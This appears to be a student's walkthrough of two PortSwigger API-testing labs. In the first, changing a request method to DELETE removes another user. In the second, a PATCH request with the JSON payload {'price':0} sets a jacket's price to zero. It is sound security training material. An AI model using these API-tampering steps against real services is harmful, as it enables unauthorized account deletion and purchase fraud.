API Testing Portswigger

Exploiting an API endpoint using documentation

Task :

To solve the lab, find the exposed API documentation and delete carlos. You can log in to your own account using the following credentials: wiener:peter.

Walk trough :

First, set up your proxy and go across the website to intercept some request.

Our goal is to delete an user through the API this endpoint with /api could be the way to go.

This GET request from the API give us this page where we can change an email.

Let's trigger the API by changing our mail and see what kind of request we intercept.

We have a new POST request with a endpoint we never saw before.

We can change the request method to DELETE and just replace the user wiener with carlos.

Job done, we deleted the user Carlos.

Finding and exploiting an unused API endpoint

Labs :

To solve the lab, exploit a hidden API endpoint to buy a Lightweight l33t Leather Jacket. You can log in to your own account using the following credentials: wiener:peter.

Walk trough :

First, let's connect to the app with given creds and navigate to the jacket to discover potential interesting endpoints.

Our account balance is 0$ and we need that jacket of 1337$. We have an interesting json in the response coming from the API. {"price":"$1337.00","message":"Your neighbor just bought one of these! Don't feel left out!"} We can assume we'll have to change the request method to post in order to manipulate the API data.

We have " method not allowed " in response. We can try others method until we see a different error message.

Apparently PATCH is allowed, with PATCH we can manipulate API data. Only 'application/json' Content-Type is supported so we have to add it in the request.

PATCH is user to applies partial changes to a resource, since we haven't precise a resource we got an error.

Based on our first json, we can modify the price with this payload :

{
    "price":0
}

Add it in the request, send it and the price on the website will change.